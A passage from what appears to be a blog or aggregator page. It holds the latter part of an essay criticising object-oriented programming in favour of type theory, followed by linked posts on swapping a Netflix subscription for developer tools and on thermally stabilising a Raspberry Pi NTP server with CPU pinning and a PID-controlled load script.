  2. Points out you can't give your own .trimLeft to a String -class when you don't implement the String class. You got to create String.trimLeft instead.
  3. Tells about monkey-dispatch in Python, to add things into a class as an afterthought is bringing up its own problems.
  4. Picks mutable state issues up. Points out mishandling of mutable state doesn't happen often in OOP, but when it does it's making up for that in how wrecking it is.
  5. Optimization of OOP code increases it's complexity a lot.
  6. Object-hierarchies may end up being cyclic, forming structures that are very difficult to maintain. States you can handle this with tooling but questions whether the complexity is necessary.

I think in certain groups use of OOP has declined. There are a lot more people who understand type theory and formal verification than there were 14 years ago. Haskell finally ranks #40 on TIOBE index!

In big scale OOP is doing just great because there are more programmers than ever! They're going through Uncle Bob's night reading, learning about design patterns, SOLID and everything else OOP that sounds great. It is also great time for OOP in programming languages. Popular languages such as Javascript and Python are steered by their communities in a democratic resolution that relies on dialogue.

I was also in belief that people would start using OOP languages in non-OOP way but that hasn't entirely happened yet. Here we are still discussing OOP and we haven't gotten over it yet..

The rigidity of methods given to a class is a real problem but it's usually ignored. Maybe it's not seen as a big problem because you have to import your own trimLeft from a module anyway.

When you write interactive programs with monads, it doesn't go the way that mutation would disappear. Monadic IO pushes the mutable structures to the edges of the program but you still have them or something like it. I've explained this in "Understand IO Monad and implement it yourself in Haskell" .

He seem to confuse that pattern matching would replace multiple dispatch and it doesn't actually work that way. Multiple dispatch also doesn't work and the worst thing it'll be only apparent and gets worse after you rely on it more, I tried that in my lever programming language and it went badly.

At least we've figured out already 14 years ago that referential transparency is important! I'm glad about that. Now we just need to get somebody to chant "mathematical expressions!" in front of developers.

The Case Against OOP is Wildly Overstated

Matthew MacDonald's take is that you can't rule without attracting enemies. Just look at all these blog posts by various people and more behind the curtains.

  1. Doubts that sloppy design practices and fuzzy architectural thinking would be unavoidable parts of OOP.
  2. States, correctly, that OOP isn't supposed to model the real world.
  3. Object-relational mapping is exemplified as an antipattern.
  4. Eloquent Javascript advice: Pick the simplest approach that meets the need.
  5. States that software design is hard to do right, no matter the tools.
  6. Design patterns can result in a mess, tells to instead focus on the Don't Repeat Yourself and You Ain't Gonna Need It, Law of Demeter (restrict what classes must know about each other), and valuing simplicity and readability above all else.
  7. Points OOP inheritance is the weakest link and attacked often. They're right, be careful of using it.
  8. OOP doesn't prevent you from applying the wrong solution to a problem.
  9. We'll see if Go and Rust steals the crown in the next decade.
  10. Agrees that OOP is indeed fading in domination, probably.

I got relatively little to say about this post itself. The title has been chosen fairly well as it accurately presents author's opinion, sans wildly. The author actually seem to agree there's a case against OOP although says it's overstated.

I'm glad people finally figured out that ORM sucks.

There's the usual claim that OOP isn't supposed to model the real world. This came up into OOP/anti-OOP discussion when it became more apparent that people followed up with what they were taught in a rather strict manner. The pretense that you weren't supposed to follow up with what you were taught. I still remember my own principled OOP-calculator written in C++. Hah. I remember how somebody commended it in IRC. They're all wrong about it either way. Forming a taxonomical model is ok if it participates to solving the problem at hand.

The advice about not blaming your tools is good advice, don't blame your tools... leave that to me. I am a professional tool-blamer!

Grady Booch's book: Object-oriented Analysis and Design with Applications

According to Quora, the 4 pillars of OOP are claimed to originate from the book "Object-oriented Analysis and Design with Applications" by Grady Booch, published by Addison-Wesley Professional in 1990.

Highlights:

  1. There are well-done comical illustrations sprinkled through.
  2. He already addresses the thing about categorical hierarchies in this book. The book talks about identifying key abstractions . It was already recognized here that plain taxonomies doesn't work for abstraction, simply because there's multiple of them that are all valid.
  3. Probably something else interesting would be in there if I bothered to read deeper.
  4. It's better than many later OOP books. It comes with a long references section and a large glossary.

I got my hands on the second edition published in 1994 and I looked in to see what Booch means with abstraction, encapsulation, inheritance and polymorphism.

I'm also interested about how the book treats class/object -structures and programming languages.. If I were smarter than I am, I might have went deeper on this regard.

4 pillars of OOP

I don't bother to search deep into this book but at least there's a glossary. It explains these terms! We can't treat any book as a foundation anyway, but we get some reference points.

abstraction ""The essential characteristics of an object that distinguish it from all other kinds of objects and thus provide crisply-defined conceptual boundaries relative to the perspective of the viewer; the process of focusing upon the essential characteristics of an object. Abstraction is one of the fundamental objects of the object model.""

encapsulation ""The process of compartmentalizing the elements of an abstraction that constitute its structure and behavior; encapsulation serves to separate the contractual interface of an abstraction and its implementation.""

inheritance ""A relationship among classes, wherein one class shares the structure or behavior defined in one (single inheritance) or more (multiple inheritance) other classes. Inheritance defines an "is-a" hierarchy among classes in which a subclass inherits from one or more generalized superclasses; a subclass typically specializes its superclasses by augmenting or redefining existing structure and behavior.""

polymorphism ""A concept in type theory, according to which a name (such as variable declaration) may denote objects of many different classes that are related by some common superclass; thus, any object denoted by this name is able to respond to some common set of operations in different ways.""

What does Booch think of OOP these days? There's a interview with Booch in 2009 . Back then the guy still admitted to using Java and PHP with Eclipse.

Booch's treatment of programming languages

There's a list in the book: Weigner's classification of more popular high-order programming languages into generations arranged according to language features they first introduced:

First-Generation languages

  1. FORTRANI (mathematical expressions)
  2. ALGOL 58 (mathematical expressions)
  3. Flowmatic (mathematical expressions)
  4. IPL V (mathematical expressions)

Second-generation languages:

  1. FORTRANII (subroutines, separate compilation)
  2. ALGOL 60 (Block structure, data types)
  3. COBOL (Data description, file handling)
  4. Lisp (List processing, pointers, garbage collection)

Third-generation languages:

  1. PL/1 (FORTRAN + ALGOL + COBOL)
  2. ALGOL 68 (Rigorous successor to ALGOL 60)
  3. Pascal (Simple successor to ALGOL 60)
  4. Simula (Classes, data abstraction)

The generation gap (1970-1980)

  1. Many different languages were invented, but few endured. [2]

I find the first-generation languages hilarious. They're right on the money if I'd believe this list was accurate. The positioning of Lisp is pretty funny as well.

I'm not sure, but perhaps Booch took the shape of the programming language as granted? "These are the means of abstraction I get and I better make best use of them". Unfortunately I didn't find any support for this idea, otherwise it'd settle the whole debate around OOP.

Otherwise I really like how this book is structured. It's a great example of a book as the glossary and references section doesn't look like they were a Caecum. I'm likely returning to take more notes of how it delivers its content.

The delusion is strong binding force in Nounland

The whole point of this post is that hey,

  1. Inheritance was supposed to be an important pillar but now it's rolling on the floor?
  2. Are you sure about polymorphism? First of all you took it from type theory and that's itself getting popular featuring stable forms of parametric polymorphism, while your version of polymorphism is shifting shape like crazy.
  3. With only two pillars standing, OOP is seeming more of a balancing act rather than an architectural wonder it was supposed to be.
  4. There's a whole mobile phone software industry standing on Java which has heavy object oriented foundations.

When people start to move the poles you might be mistaken that the whole object oriented programming is a circus performance. It's like musical chairs but played with foundational pillars.

It'd be a bit of irony to show the problems with examples from Booch's book, therefore all of the OOP examples here are from that book.

2020-08-03 Addendum to above: [hwayne][hwayne] pointed out that ML cited CLU's type system as inspiration, which cited Simula as inspiration. From a historical perspective polymorphism have migrated from OOP to FP.

[hwayne] : https://lobste.rs/s/bmzgvz/case against oop is wildly overstated#c f7arfr

A record with an overinflated ego

Object oriented programming started from the need of greater customization for datatypes. The only form of customization used to come in a form of a record datatype.

struct PersonnelRecord
{
    char  name[100];
    int   socialSecurityNumber;
    char  department[10];
    float salary;
}

When it was recognized that you would want more abstraction and customization into datatypes, classes were born. Classes extend from records by letting you to define methods and structures that are shared between every object.

class PersonnelRecord {
public:
  char* employeeName() const;
  int   employeeSocialSecurityNumber() const;
  char* employeeDepartment() const;
protected:
  char  name[100];
  int   socialSecurityNumber;
  char  department[10];
  float salary;
}

It was considered good engineering practice to encapsulate the state of an object like this. When you separate the access to parameters like this, you can now change the implementation of the record into something else and nobody who is using this object needs to know how it's implemented.

The implementation of the feature was easy, karen.employeeName() just calls some function instead of really accessing a function in a record. It was easy and much cheaper than other things you could do.

Very early on this also gave some namespace around the methods. When you really had nothing else this all must have been looked very great and minimal.

Today it's possible to give you far more distance between hardware than it used to be 30 years ago. Is there any reason why you should build abstractions over flat record structures now?

Inheritance & Polymorphism

I was going to write about inheritance and polymorphism entirely separately, but they're actually provided by the same structure. Inheritance enables the polymorphism.

A common use is to describe variance between different forms of records. It's presented in this example of a base class.

class TelemetryData {
public:
  TelemetryData();
  virtual ~TelemetryData();
  virtual void transmit();
  Time currentTime() const;

protected:
  int id;
  Time timeStamp;
};

The base class describes what you can do to the structure as well as identifies things that every structure share. This structure is then extended to contain more information specific to certain class of structures:

class ElectricalData : public TelemetryData {
public:
  ElectricalData(float v1, float v2, float a1, float a2);
  virtual ~ElectricalData();

  virtual void transmit();

  float currentPower() const;

protected:
  float fuelCell1Voltage, fuelCell2Voltage;
  float fuelCell1Amperes, fuelCell2Amperes;
}

The "virtual" methods are accessed from a virtual method table associated to each class. This results in a pointer that could be used to identify class of an object so that it can be promoted. Using the approach is considered a bad style because classes are supposed to be extensible. The pointer just cannot be used to identify a class directly because you may subclass any class and extend it, receiving a different vtable pointer for it. To identify vtables you have to be able to chain them.

What does it translate to?

For curiosity somebody may ask, how were classes simple to implement? There are several ways to implement classes/objects. You can implement them as a very thin layer above records.

Classes translate down into structures that each have a virtual table pointer in front of them. Note that the pointer is needed because a class extending from a structure may declare its own virtual methods.

struct EmptyClass {
    void *vtable;
};

struct TelemetryData {
    struct EmptyClass super;
    int id;
    Time timeStamp;
};

struct ElectricalData {
    struct TelemetryData super;
    float fuelCell1Voltage, fuelCell2Voltage;
    float fuelCell1Amperes, fuelCell2Amperes;
};

The static methods are referenced directly and translate to plain procedures like these.

TelemetryData_TelemetryData(TelemetryData*);
Time TelemetryData_currentTime(TelemetryData*);

ElectricalData_ElectricalData(ElectricalData*, float v1, float v2, float a1, float a2);
float ElectricalData_currentPower();

If something's declared virtual, it goes into a virtual method table.

struct EmptyClass_vtable {
    // void *vtableParent; /* If the dreaded 'instanceof' is implemented. */
};

struct TelemetryData_vtable {
    struct EmptyClass_vtable super;
    void (*deconstruct)(TelemetryData*);
    void (*transmit)(TelemetryData*);
};

struct ElectricalData_vtable {
    struct TelemetryData_vtable super;
};

static TelemetryData_vtable  vtable_TelemetryData;
static ElectricalData_vtable vtable_ElectricalData;

It's easy to confuse the type of a vtable and the actual vtable, though this itself is not a flaw of any kind and you don't need to worry about how classes and objects are implemented if they've been implemented correctly. Whenever the ElectricalData is constructed, the vtable in it is set to point on (&vtable_ElectricalData) .

Closed/Open-definition structures and "instanceof"

Inheritance allows you to build both closed-definition and open-definition structures.

  1. Open-definition structures are structures that you can extend by deriving from them.
  2. Closed-definition structures are defined in a bunch, and you assume it's only one of the possible options that you may receive. No further extension of the base class is expected.

These things should be separate because otherwise they tangle together. To avoid this early OOP languages didn't have the "instanceof" although they could have had that through vtables.

You create a closed structure by tagging it.

enum {
    t_ElectricalData = 0
    t_LightTracking,
    t_DoorLockData
} TelemetryTag;

Then you can require that when the telemetryTag is t_ElectricalData , it's either the ElectricalData or some subclass of it.

if (telem.tag == t_ElectricalData) {
    ElectricalData* elec = (ElectricalData*)telem;
    /* Do something with it.. */
}

This changed when Java introduced the instanceof , it lets you to be convenient and do it like this:

if (telem isinstanceof ElectricalData) {
    ElectricalData elec = (ElectricalData)telem;
    /* access elec */
}

instanceof immediately became a dreaded and abused feature of object oriented programming. I guess they did it because Java also introduced garbage collection and this was an ancillary detail of an otherwise safer memory management or a newly available object-introspection tool. Ignorance of the problems introduced by this feature took care of the rest.

If you look this up, I could link it to here if you inform me why Java introduced instanceof?

Fake abstraction

That we're slapping features together like this results in fragility on its own. The way these structures are used are tightly wound to how they're implemented by the compiler. This is not how abstraction is supposed to work, but I let you pretend it's intact for courtesy.

This tradition of fake abstraction is followed through in Java and C#. They come up with their own virtual machines and instead of translating across multiple platforms like a well-typed and compiled language otherwise could, they refuse to work on anything else than their virtual machines provided along them. In this regard you find a typed, compiled language but it behaves just like an untyped language such as Python or Javascript.

Uncontrolled polymorphism

Virtual class methods provide polymorphism and allow you to select behavior at runtime. There's bit of a problem because this form of polymorphism is arbitrary. It means that you can do about anything without constraints. This would be otherwise a good thing, but you won't know which of them will result in good behavior of the program. If you don't know that then you could as well not have it.

Besides the rules for building well-formed polymorphic programs in object oriented programs are complex, involving ideas such as covariance and contravariance Turns out that often you, or neither often your superiors know exactly how an OO-program should use polymorphism. You still use this feature though!

Covariance and Contravariance

The object oriented programming builds on subtyping. The subtyping means that when somebody asks for a Cat, you can give him a CatDog and he gets to interface with the Cat -part. You can pass more information in than is exactly required, likewise you may be answered with more information than you requested.

Types get ordering based on how much "information" they contain. When this ordering is preserved, the things are said to be covariant. Eg. Somebody provides a Cat and you want an Animal. If the ordering is reversed, such as in you have to pass in an Animal and you provide in a Cat, then it's contravariant. It's bivariant if it needs to pass and receive Cats. It's invariant if it's irrelevant whether it's a Cat.

These things are very easy to confuse to the point that I'm not sure if I just did. If you get them wrong then your polymorphism just blows up.

Parametric polymorphism

There's a fairly simple way to write well-behaving polymorphic programs. The trick is to enforce that polymorphic programs treat their polymorphic parts uniformly. When polymorphic programs aren't allowed to look inside the structures they manipulate, then it's well-defined how they're manipulating those structures. This is known as parametric polymorphism and it's a common style in functional programming languages for polymorphism. For example, when you meet a function such as:

a → a

You know that the function cannot access the insides of a in any way, it must go through the function. However when you give in an additional function like this:

(a → a) → (a → a)

You know that a function of this type may send the a through the second function zero or many times. It's much less hard to operate and reason about objects that are consistently what they need to be.

Features that break parametric polymorphism

The neat thing about parametric polymorphism is that it ends up being programming language designer's fault if it ends up broken. It's no longer programmers fault.

The easiest way to break parametric polymorphism is to introduce an implicit Monad "join", this also destroys the monad -part of the construct.

maybe (maybe a)     → maybe a
promise (promise a) → promise a
array (array a)     → array a

The first one is often broken by introducing a Nothing constant and leaving out the Just(a) for convenience, or giving implicit Null to every structure constructed with a pointer so that it's easy to initialize. This results in being unable to distinguish between Nothing and Just Nothing , which breaks parametric polymorphism on the variables wrapped with these structures. If maybe a or a? receives a "null" and a happens to be maybe something , then the higher-up structure catches the null. This is akin to the problems of isinstance as the information in a is suddenly being identified and interpreted in an unpredictable way.

It's lot more uncommon to see the latter two broken. You might see the arrays being broken on some early programming languages. The promise was broken in Javascript and there's a whole issue for it, the dreaded issue 94 .

Why pattern matching doesn't dynamic dispatch

Since polymorphic programs aren't allowed to look inside their parameters in functional programming, it also means that pattern matching cannot be used to dispatch on structures.

Patterns in a functional programming language are structures that have a closed definition. This means that their definition completely determines how many ways there are to construct them.

data Form = A | B | C

When the structure is examined, well-formed program is required to handle every possible case that arises.

case form of
    A -> 1
    B -> 2
    C -> 3

This separation verifies that you have a much simpler model for building programs. It partially replaces the inheritance of object oriented programming though, you'll be able to create those close-definition objects in this way.

But how do they dynamic dispatch then?

Dynamic dispatch actually resembles passing modules or functions along the arguments. Technically it's not any different to the OOP, but the virtual table is an explicitly described construct.

You might have a record that provides you variety of ways to manipulate the structures, the a is a parameter that can be chosen by the user:

record Arithmetic a = {
    show    : a → string,
    (+)     : a → a → a,
    (-)     : a → a → a,
    literal : Integer → a }

These records can be then passed around into a function that does something abstracted over arithmetic that it does.

Arithmetic a → a → a

You may notice how it resembles the virtual table example earlier.

Better ways to do it

Functional programming is itself getting highjacked by the same consultants who rode the wave and pushed OOP. Things I'm going to present here should instead be taken as promotion or shilling of dependent type theory and formal-logic-based programming.

I left mutability out of discussion because there's no additional problems with mutability when it comes to functional programming. The reason why this is perceived as a problem is due to precision functional programming requires from the programmer. Jean-Yves Girard and many other mathematicians took care of that a long while ago. Besides if you immediately need what you already get from OOP, then you can get such a similar mess with mutable references for instance in Haskell.

(Mis?)conception about types

There's an old conception around types that I were reminded of while reading Grady Booch's book as I saw a picture of a dude trying to plug a statue of number 3 into a hole. The statue was labeled with what it was signifying, and the hole signified something else.

The idea is that the use of types is to ensure you don't mix up things such as eg. "number of chicken" to "how much a chicken costs". That's almost a type-theoretic idea though. A better example would be mixing up 5 dollars and 5 euros.

The point of types according to this explanation would be that it prevents from mixing things up. It's almost correct but slightly wrong. It also drives you to think of subtyping hierarchies like this:

dollar extends money
euro extends money

The example isn't giving types the attention they deserve though. It's awful lot of effort to build separate number types just to verify that we don't mix money units. Very few people are doing that.

Instead there's a thing you might do with types. A type verifies that if you need some structure then the given structure is indeed what you're expecting. We can exploit this property by asking for very fancy things and then demonstrate that you have them.

For example, you can construct a type that states that the sum of angles of a triangle is 180 degrees. The structure would be a proof that proves the proposition. Therefore when you have such a structure, then you know that in your model of a triangle the angles sum to 180 degrees.

Both procedural and functional programming languages alike allow some logical reasoning based on types. The difference is that from functional programming languages the step-up to type-theory is as easy as abc.

Referential transparency

Referential transparency is a potential property of a computer program. A referentially transparent program can be replaced by it's value without changing it's behavior. Lets say that x and y are programs, and you know they're equal, this is written as x = y . The meaning of this is same as in mathematics. It means that x and y have the same value. If both of them are referentially transparent, then you can rewrite x to y anywhere in the program and vice versa.

For a programmer this mainly means that you need to separate side effects, or "behavior", from the reduction rules. It enables you to do equational reasoning though! The equational reasoning is the thing where you equate things together to walk a trail in order to verify something, basically things that everybody learnt in schools.

The multiple dispatch issues

Karsten proposed you'd do multiple dispatch. This used to be a popular idea. I think somebody figured it was bad but nobody listened that guy. Anyway, if a programming language has a multiple dispatch and it's used something like this:

add(int, int)
add(float, int)
add(int, float)
add(float, float)
...

I'd advice you to stay far away from it for your own good, unless you really know that it is extensible for real. Dynamic dispatch is too limited and becomes difficult with parametric types that are inevitable if you do physics computations. It's very likely it won't support the needs of a computer algebra system, and it won't provide interoperability you need.

To see where the problem is, just think about this: If int/float were separate modules that do not depend on each other, where the (int,float) and (float,int) pairs should be defined? Nowhere? Somewhere? In either one of the modules but why?

Taxonomies, categorical hierarchies and maps

Modern OOP texts demonize these categorical hierarchies because they make the most embarrasing and entertaining counter-examples for object oriented programming. Taxonomies themselves aren't too bad. They only become problematic when you pretend you only have one valid way to group things together. It's an unusual problem to have unless you do OOP.

It's really similar to mappings or projections in this sense. A lot of effort has been spent to find different ways to flatten a globe so that you could create maps for it. Some projections preserve areas, others preserve distances or angles. People generally, except very few of us, do not have issues with interpreting maps.

Proper application of type theory doesn't prevent you from picking only one when it comes to a taxonomy of some kind. If a representation for something becomes inconvenient, you can switch into an isomorphic representation.

Usually isomorphism relates two functions like this:

f : a → b
g : b → a

They're made isomorphic by verifying that their compositions form functions that do nothing. That g.f is an identity for a and f.g is the identity for b .

Turns out, isomorhisms allow you to switch between equivalent definitions. It means you don't need to stick to any specific categorization of things and treat it as an absolute representation. Putting a function in between that preserves the shape keeps it the same. Type-checked value is like a cat, it sits if it fits.

Logic programming hidden in sight

This is here in case you still need some coinvincing that it's the EOL for OOP paradigm. If you stop subtyping then you lose the convenience of subtyping entirely. Though, in return you get something even more convenient back.

The types-as-propositions -correspondence means that types are valid terms in a logic programming environment. This is already used in Haskell with typeclasses. Instance declarations like these can be interpreted as logic programs. It's similar to haskell's corresponding program, except that there's a construction tied to it. Above there's the haskell instance declaration and below is the closest corresponding Prolog program.

instance Show String
instance Show Int
instance (Show a, Show b) => Show (a,b)
instance Show a => Show [a]

show(string).
show(int).
show(pair(A,B)) :- show(A), show(B).
show(list(A)) :- show(A).

When something queries for a type constraint such as (Show [(Int, String)]) , the GHC compiler can be interpreted to run a proof search where the returned "proof" is a fully constructed instance to satisfy the constraint. The requirement for this kind of system to work well is that any result produced by the inference is as acceptable as any other result it could produce. To enforce this in Haskell functionality has been limited to something that you can expect to produce an unique result. Though there you see a computer building parts of the program for you because they're obvious.

The similarity with Prolog and Haskell's type checker is not a new observation either. Thomas Hallgren wrote a paper about it, "Fun with Functional Dependencies" [pdf] , 20 years ago. This paper illustrates how Haskell's type class system can be used to express decidable computations at compile-time, the most elaborate example given there is a static implementation of insertion-sort.

These features aren't easily "ported" to procedural or object oriented programming environments because they rely on the consistency that comes with stricter application of type theory.

Mathematical explanation for why OOP sucks a big time

There's a potential mathematical reason for why OOP is giving us such a bad time and we're writing about it every once and then. It has to do with the open-ended rules left into popular languages. When OOP languages come with a type system, they prevent you from doing some dumb things but still let you do whole lot of idiotic things. It eventually results in code breaking when it's combined in different ways. This elicites a response from a programmer to cope with it and he writes code with the strictest possible interfaces that you can come up with.

You'll see the Java and C# even support this and make it inconvenient to write abstract variables and convenient to throw in few int s and float s, although these are quite close to the machine implementation. 32bit IEEE754 floating points do not satisfy common algebraic laws you'd expect from real numbers for instance. Integers are usually machine integers that have limits in their range and they behave like modular arithmetic instead of the usual arithmetic. When you've selected a type like this, often you've closed off many other possible representations early on.

In functional programming you just say "a" if it's something that goes through your system intact. That's as abstract as it can be and allows many different variations of the same program to be constructed for very little effort.

Similar posts

What you can get for the price of a Netflix subscription

Hacker News
nmil.dev
2025-11-25 06:39:36
Comments...
Original Article

A couple of weeks ago, I decided to do away with my Netflix subscription. I simply was barely using it, and whenever I did it was more out of habit than it really being the thing I wanted to do with my time. Sure, there's still some decent stuff on there, but the vast majority of it feels absolutely moneyballed. Good, but somehow too good , and with no character.

As much as I'd love to elaborate on why I think Netflix is evil, that's not todays topic. What I wanted to share is how for approximately the price I was paying for my subscription (€19.99), I've snapped up three subscriptions that I'm using on a daily basis. They're all pretty much interchangeable with other alternatives. The main thing I want to highlight is the individual slot they each fill out for me.

1. A subscription to Zed Pro (~€10)

Frankly, I haven't really put too much thought into whether the unit economics are the best here. The main point is, these are €10 that make my coding experience more pleasant, and get me writing more code in my spare time. In that sense it's money well spent.

Does it matter if you get a Cursor subscription, or a Zed one, or whatever else is in vogue when you're reading? No, just get the thing that will get you excited to get your hands on the keyboard! To me, Zed feels more intentionally built than the VSClones: things flow nicely, it feels snappy, the ui is less cluttered... It's just nice .

Editor preferences aside, the main takeaway is, invest in a hobby you actively engage in. Make that little bit more appealing and you have one more reason to be spending your time doing the thing that makes you feel good, rather than letting a couple hours a day evaporate watching another forgettable show.

2. A Kagi subscription (~€5/month)

I think we can mostly agree google kind of sucks nowadays. Whenever I search, I automatically scroll down to skip the sponsored posts and SEO maxxed websites, and still don't fully trust what I get. Maybe that's why we all started appending “reddit” the end of our searches.

Are the search results themselves better with Kagi? To be honest, I can't tell yet, others have written far more informed takes on the topic. What does it for me is the simple fact of being able to pay directly for a service that I use, and value, rather than having to trade my attention in and endure a wall of ads. Especially if it's something I use over and over, every day. That's what I mean to highlight here: we can support products that we enjoy by paying for them (who would have thought?) rather than letting them lobotomize us via ad feeds.

3. A cheap server on Hetzner (~€4/month)

Again, the choice of provider here is secondary. The point is, I finally have my little stake on the internet. It's relatively barebones, and I like that. It forces me to learn and engage. In fact, that is where my blog is hosted!

So to sum it up: We don't have to default to a streaming subscription because that's become the standard human-being thing to do. For the same money you can build a suite of useful, well crafted tools that help you: – Get the most out of your hobbies – Spend less time looking at ads – Build things you can share with the world

P.S. Not one word here was written by AI. I plan on keeping it that way for anything that goes on this blog. So, if anything reads like slop, it's my slop :)

Most Stable Raspberry Pi? 81% Better NTP with Thermal Management

Hacker News
austinsnerdythings.com
2025-11-25 06:35:59
Comments...
Original Article

I’ve written before about building microsecond-accurate NTP servers with Raspberry Pi and GPS PPS , and more recently about revisiting the setup in 2025 . Both posts focused on the hardware setup and basic configuration to achieve sub-microsecond time synchronization using GPS Pulse Per Second (PPS) signals.

But there was a problem. Despite having a stable PPS reference, my NTP server’s frequency drift was exhibiting significant variation over time. After months (years) of monitoring the system with Grafana dashboards, I noticed something interesting: the frequency oscillations seemed to correlate with CPU temperature changes. The frequency would drift as the CPU heated up during the day and cooled down at night, even though the PPS reference remained rock-solid.

Like clockwork (no pun intended), I somehow get sucked back into trying to improve my setup every 6-8 weeks. This post is the latest on that never-ending quest.

This post details how I achieved an 81% reduction in frequency variability and 77% reduction in frequency standard deviation through a combination of CPU core pinning and thermal stabilization. Welcome to Austin’s Nerdy Things, where we solve problems that 99.999% of people (and 99% of datacenters) don’t have.

The Problem: Thermal-Induced Timing Jitter

Modern CPUs, including those in Raspberry Pis, use dynamic frequency scaling to save power and manage heat. When the CPU is idle, it runs at a lower frequency (and voltage). When load increases, it scales up. This is great for power efficiency, but terrible for precision timekeeping.

Why? Because timekeeping (with NTP/chronyd/others) relies on a stable system clock to discipline itself against reference sources. If the CPU frequency is constantly changing, the system clock’s tick rate varies, introducing jitter into the timing measurements. Even though my PPS signal was providing a mostly perfect 1-pulse-per-second reference, the CPU’s frequency bouncing around made it harder for chronyd to maintain a stable lock.

But here’s the key insight: the system clock is ultimately derived from a crystal oscillator , and crystal oscillator frequency is temperature-dependent. The oscillator sits on the board near the CPU, and as the CPU heats up and cools down throughout the day, so does the crystal. Even a few degrees of temperature change can shift the oscillator’s frequency by parts per million – exactly what I was seeing in my frequency drift graphs. The CPU frequency scaling was one factor, but the underlying problem was that temperature changes were affecting the crystal oscillator itself. By stabilizing the CPU temperature, I could stabilize the thermal environment for the crystal oscillator, keeping its frequency consistent.

Looking at my Grafana dashboard, I could see the frequency offset wandering over a range of about 1 PPM (parts per million) as the Pi warmed up and cooled down throughout the day. The RMS offset was averaging around 86 nanoseconds, which isn’t terrible (it’s actually really, really, really good), but I knew it could be better.

The Discovery

After staring at graphs for longer than I’d like to admit, I had an idea: what if I could keep the CPU at a constant temperature? If the temperature (and therefore the frequency) stayed stable, maybe the timing would stabilize too.

The solution came in two parts:

1. CPU core isolation – Dedicate CPU 0 exclusively to timing-critical tasks (chronyd and PPS interrupts) 2. Thermal stabilization – Keep the other CPUs busy to maintain a constant temperature, preventing frequency scaling

Here’s what happened when I turned on the thermal stabilization system on November 17, 2025 at 09:10 AM:

NTP Frequency Stability

That vertical red line marks when I activated the “time burner” process. Notice how the frequency oscillations immediately dampen and settle into a much tighter band? Let’s dive into how this works.

The Solution Part 1: CPU Core Pinning and Real-Time Priority

The first step is isolating timing-critical operations onto a dedicated CPU core. On a Raspberry Pi (4-core ARM), this means:

  • CPU 0: Reserved for chronyd and PPS interrupts
  • CPUs 1-3: Everything else, including our thermal load

I had AI (probably Claude Sonnet 4 ish, maybe 4.5) create a boot optimization script that runs at system startup:

#!/bin/bash
# PPS NTP Server Performance Optimization Script
# Sets CPU affinity, priorities, and performance governor at boot

set -e

echo "Setting up PPS NTP server performance optimizations..."

# Wait for system to be ready
sleep 5

# Set CPU governor to performance mode
echo "Setting CPU governor to performance..."
cpupower frequency-set -g performance

# Pin PPS interrupt to CPU0 (may fail if already pinned, that's OK)
echo "Configuring PPS interrupt affinity..."
echo 1 > /proc/irq/200/smp_affinity 2>/dev/null || echo "PPS IRQ already configured"

# Wait for chronyd to start
echo "Waiting for chronyd to start..."
timeout=30
while [ $timeout -gt 0 ]; do
    chronyd_pid=$(pgrep chronyd 2>/dev/null || echo "")
    if [ -n "$chronyd_pid" ]; then
        echo "Found chronyd PID: $chronyd_pid"
        break
    fi
    sleep 1
    ((timeout--))
done

if [ -z "$chronyd_pid" ]; then
    echo "Warning: chronyd not found after 30 seconds"
else
    # Set chronyd to real-time priority and pin to CPU 0
    echo "Setting chronyd to real-time priority and pinning to CPU 0..."
    chrt -f -p 50 $chronyd_pid
    taskset -cp 0 $chronyd_pid
fi

# Boost ksoftirqd/0 priority
echo "Boosting ksoftirqd/0 priority..."
ksoftirqd_pid=$(ps aux | grep '\[ksoftirqd/0\]' | grep -v grep | awk '{print $2}')
if [ -n "$ksoftirqd_pid" ]; then
    renice -n -10 $ksoftirqd_pid
    echo "ksoftirqd/0 priority boosted (PID: $ksoftirqd_pid)"
else
    echo "Warning: ksoftirqd/0 not found"
fi

echo "PPS NTP optimization complete!"

# Log current status
echo "=== Current Status ==="
echo "CPU Governor: $(cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor)"
echo "PPS IRQ Affinity: $(cat /proc/irq/200/effective_affinity_list 2>/dev/null || echo 'not readable')"
if [ -n "$chronyd_pid" ]; then
    echo "chronyd Priority: $(chrt -p $chronyd_pid)"
fi
echo "======================"

What this does:

  1. Performance Governor : Forces all CPUs to run at maximum frequency, disabling frequency scaling
  2. PPS IRQ Pinning : Ensures PPS interrupt (IRQ 200) is handled exclusively by CPU 0
  3. Chronyd Real-Time Priority : Sets chronyd to SCHED_FIFO priority 50, giving it preferential CPU scheduling
  4. C hronyd CPU Affinity : Pins chronyd to CPU 0 using taskset
  5. ksoftirqd Priority Boost : Improves priority of the kernel softirq handler on CPU 0

This script can be added to /etc/rc.local or as a systemd service to run at boot.

The Solution Part 2: PID-Controlled Thermal Stabilization

Setting the performance governor helps, but on a Raspberry Pi, even at max frequency, the CPU temperature will still vary based on ambient conditions and load. Temperature changes affect the CPU’s actual operating frequency due to thermal characteristics of the silicon.

The solution? Keep the CPU at a constant temperature using a PID-controlled thermal load. I call it the “time burner” (inspired by CPU burn-in tools, but with precise temperature control).

As a reminder of what we’re really doing here: we’re maintaining a stable thermal environment for the crystal oscillator . The RPi 3B’s 19.2 MHz oscillator is physically located near the CPU on the Raspberry Pi board, so by actively controlling CPU temperature, we’re indirectly controlling the oscillator’s temperature. Since the oscillator’s frequency is temperature-dependent (this is basic physics of quartz crystals), keeping it at a constant temperature means keeping its frequency stable – which is exactly what we need for precise timekeeping.

Here’s how it works:

  1. Read CPU temperature from /sys/class/thermal/thermal_zone0/temp
  2. PID controller calculates how much CPU time to burn to maintain target temperature (I chose 54°C)
  3. Three worker processes run on CPUs 1, 2, and 3 (avoiding CPU 0)
  4. Each worker alternates between busy-loop (MD5 hashing) and sleeping based on PID output
  5. Temperature stabilizes at the setpoint, preventing thermal drift

Here’s the core implementation (simplified for readability):

#!/usr/bin/env python3
import time
import argparse
import multiprocessing
import hashlib
import os
from collections import deque

class PIDController:
    """Simple PID controller with output clamping and anti-windup."""
    def __init__(self, Kp, Ki, Kd, setpoint, output_limits=(0, 1), sample_time=1.0):
        self.Kp = Kp
        self.Ki = Ki
        self.Kd = Kd
        self.setpoint = setpoint
        self.output_limits = output_limits
        self.sample_time = sample_time
        self._last_time = time.time()
        self._last_error = 0.0
        self._integral = 0.0
        self._last_output = 0.0

    def update(self, measurement):
        """Compute new output of PID based on measurement."""
        now = time.time()
        dt = now - self._last_time

        if dt < self.sample_time:
            return self._last_output

        error = self.setpoint - measurement

        # Proportional
        P = self.Kp * error

